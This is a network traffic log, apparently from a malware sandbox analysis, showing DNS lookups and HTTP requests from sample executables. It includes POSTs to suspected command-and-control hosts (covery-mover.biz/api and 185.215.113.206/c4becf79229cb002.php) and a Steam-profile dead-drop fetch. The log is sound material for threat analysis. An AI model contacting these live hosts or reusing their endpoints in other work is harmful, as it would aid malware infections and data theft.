Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgRo2F1UE1ELIVv9nrAu4EcCO%2BuRG%2F1ZSU3JYq5M0rIX0I0HwGBK6MN7qXXI5kJrn0Ojb48gyHywjs1gQhzZmvvbUkvRW%2FZkqhwwcz1mdwJjqAn1UD%2FlT0X4MvAu3pao7VNqdfY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effc1a3298c7708-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50818&min_rtt=49270&rtt_var=13122&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3304&recv_bytes=609&delivery_rate=74121&cwnd=251&unsent_bytes=0&cid=bdf20502329b77b1&ts=691&x=0"
DNS

se-blurry.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response
DNS

se-blurry.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

se-blurry.biz

IN A

Response
DNS

zinc-sneark.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

zinc-sneark.biz

IN A

Response
DNS

dwell-exclaim.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dwell-exclaim.biz

IN A

Response
DNS

dwell-exclaim.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dwell-exclaim.biz

IN A

Response
DNS

formy-spill.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

formy-spill.biz

IN A

Response
POST

https://covery-mover.biz/api

f3745b045c.exe

Remote address:

172.67.206.64:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: covery-mover.biz

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=gouc14eom2mq9dd3fl935h95t0; expires=Sat, 05-Apr-2025 13:35:47 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j8RaqumKoVFPmNu6B5rPnX%2FVfXfnaLPoOVugBzI1DTTe7E30dmTPGvuOCI%2FP7Q9Kxav72asEKYbg2H%2Ft%2Fv9IZUgDbv6z0HYDQ8fjqlrv4llPTvnG72%2Fe0aZMQLhgaFecXS4W"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8effc1a9695f9578-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=49191&min_rtt=48642&rtt_var=11217&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=605&delivery_rate=80573&cwnd=253&unsent_bytes=0&cid=5d11782bc21f0d66&ts=228&x=0"
DNS

dare-curbys.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

dare-curbys.biz

IN A

Response
DNS

print-vexer.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

print-vexer.biz

IN A

Response
DNS

impend-differ.biz

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

impend-differ.biz

IN A

Response
DNS

steamcommunity.com

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
DNS

steamcommunity.com

f3745b045c.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

23.214.143.155
GET

https://steamcommunity.com/profiles/76561199724331900

f3745b045c.exe

Remote address:

23.214.143.155:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 10 Dec 2024 19:49:09 GMT
Content-Length: 35597
Connection: keep-alive
Set-Cookie: sessionid=195e56bd7f2e8a34c512c25c; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
GET

http://185.215.113.206/

0858ba6bc7.exe

Remote address:

185.215.113.206:80

Request

GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://185.215.113.206/c4becf79229cb002.php

0858ba6bc7.exe

Remote address:

185.215.113.206:80

Request

POST /c4becf79229cb002.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BGIDBKKKKKFBGDGDHIDB
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Tue, 10 Dec 2024 19:49:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

firefox-api-proxy.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
GET

https://firefox-api-proxy.cdn.mozilla.net/desktop/v1/recommendations?locale=en-US&region=GB&count=30

firefox.exe

Remote address:

34.149.97.1:443

Request

GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
host: firefox-api-proxy.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
consumer_key: 94110-6d5ff7a89d72c869766af0e0
if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
te: trailers
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

44.228.225.150

shavar.prod.mozaws.net

IN A

35.85.93.176

shavar.prod.mozaws.net

IN A

54.213.181.160
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

54.213.181.160

shavar.prod.mozaws.net

IN A

35.85.93.176

shavar.prod.mozaws.net

IN A

44.228.225.150
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

216.58.213.14
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:816::200e
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
GET

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

firefox.exe

Remote address:

216.58.213.14:443

Request

GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

firefox.exe

Remote address:

216.58.213.14:443

Request

GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: YSC=bnzIUPKHiDU
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

14.213.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.213.58.216.in-addr.arpa

IN PTR

Response

14.213.58.216.in-addr.arpa

IN PTR

ber01s14-in-f141e100net

14.213.58.216.in-addr.arpa

IN PTR

lhr25s25-in-f14�H
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

172.217.169.14
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.212.206
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

216.58.213.14
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:826::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:822::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:823::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:827::200e
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

firefox.exe

Remote address:

142.250.200.46:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: YSC=bnzIUPKHiDU
cookie: SOCS=CAAaBgiAid66Bg
cookie: __Secure-YEC=CgtFU0FRaWRqZXZBRSjDtuK6BjIKCgJHQhIEGgAgYw%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgYw%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

firefox-settings-attachments.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:823::200e
GET

https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl

firefox.exe

Remote address:

34.117.121.53:443

Request

GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
host: firefox-settings-attachments.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA
DNS

160.181.213.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

160.181.213.54.in-addr.arpa

IN PTR

Response

160.181.213.54.in-addr.arpa

IN PTR

ec2-54-213-181-160 us-west-2compute amazonawscom
DNS

238.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

238.16.217.172.in-addr.arpa

IN PTR

Response

238.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f141e100net

238.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f14�I
DNS

150.225.228.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.225.228.44.in-addr.arpa

IN PTR

Response

150.225.228.44.in-addr.arpa

IN PTR

ec2-44-228-225-150 us-west-2compute amazonawscom
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

https://www.google.com/favicon.ico

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81f::2004
DNS

74.204.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

74.204.58.216.in-addr.arpa

IN PTR

Response

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f741e100net

74.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f10�H

74.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f10�H
DNS

195.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.187.250.142.in-addr.arpa

IN PTR

Response

195.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f31e100net
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN A

Response

prod.balrog.prod.cloudops.mozgcp.net

IN A

35.244.181.201
DNS

prod.balrog.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.balrog.prod.cloudops.mozgcp.net

IN AAAA

Response
DNS

201.181.244.35.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.181.244.35.in-addr.arpa

IN PTR

Response

201.181.244.35.in-addr.arpa

IN PTR

20118124435bcgoogleusercontentcom
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.155

a19.dscg10.akamai.net

IN A

88.221.134.209
DNS

ciscobinary.openh264.org

firefox.exe

Remote address:

8.8.8.8:53

Request

ciscobinary.openh264.org

IN A

Response

ciscobinary.openh264.org

IN CNAME

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com

IN CNAME

a17.rackcdn.com

a17.rackcdn.com

IN CNAME

a17.rackcdn.com.mdc.edgesuite.net

a17.rackcdn.com.mdc.edgesuite.net

IN CNAME

a19.dscg10.akamai.net

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
GET

http://ciscobinary.openh264.org/openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip

firefox.exe

Remote address:

88.221.134.155:80

Request

GET /openh264-win64-31c4d2e4a037526fd30d4e5c39f60885986cf865.zip HTTP/1.1
Host: ciscobinary.openh264.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Response

HTTP/1.1 200 OK

Last-Modified: Fri, 08 Nov 2024 02:37:54 GMT
ETag: 09372174e83dbbf696ee732fd2e875bb
Content-Length: 491284
Accept-Ranges: bytes
X-Timestamp: 1731033473.13891
Content-Type: application/zip
X-Trans-Id: txe2d6fd5524464f55a6fac-00673047f0dfw1
Cache-Control: public, max-age=124682
Expires: Thu, 12 Dec 2024 06:27:44 GMT
Date: Tue, 10 Dec 2024 19:49:42 GMT
Connection: keep-alive
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A

Response

a19.dscg10.akamai.net

IN A

88.221.134.209

a19.dscg10.akamai.net

IN A

88.221.134.155
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN A
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1
DNS

a19.dscg10.akamai.net

firefox.exe

Remote address:

8.8.8.8:53

Request

a19.dscg10.akamai.net

IN AAAA

Response

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:86d1

a19.dscg10.akamai.net

IN AAAA

2a02:26f0:a1::58dd:869b
DNS

155.134.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

155.134.221.88.in-addr.arpa

IN PTR

Response

155.134.221.88.in-addr.arpa

IN PTR

a88-221-134-155deploystaticakamaitechnologiescom
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
GET

https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip

firefox.exe

Remote address:

142.250.187.206:443

Request

GET /edgedl/widevine-cdm/4.10.2710.0-win-x64.zip HTTP/2.0
host: redirector.gvt1.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
te: trailers
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A

Response

redirector.gvt1.com

IN A

142.250.187.206
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN A
DNS

redirector.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

redirector.gvt1.com

IN AAAA

Response

redirector.gvt1.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

r4---sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4---sn-aigzrnsz.gvt1.com

IN A

Response

r4---sn-aigzrnsz.gvt1.com

IN CNAME

r4.sn-aigzrnsz.gvt1.com

r4.sn-aigzrnsz.gvt1.com

IN A

74.125.175.169
DNS

r4---sn-aigzrnsz.gvt1.com

firefox.exe

Remote address:

8.8.8.8:53

Request

r4---sn-aigzrnsz.gvt1.com

IN A
GET

https://r4---sn-aigzrnsz.gvt1.com/edgedl/widevine-cdm/4.10.2710.0-win-x64.zip?cms_redirect=yes&met=1733860183,&mh=R8&mip=181.215.176.83&mm=28&mn=sn-aigzrnsz&ms=nvh&mt=1733859861&mv=m&mvi=4&pl=27&rmhost=r1---sn-aigzrnsz.gvt1.com&rms=nvh,nvh&shardbypass=sd&smhost=r2---sn-aigzrn7s.gvt1.com

firefox.exe

Remote address:

74.125.175.169:443

Request

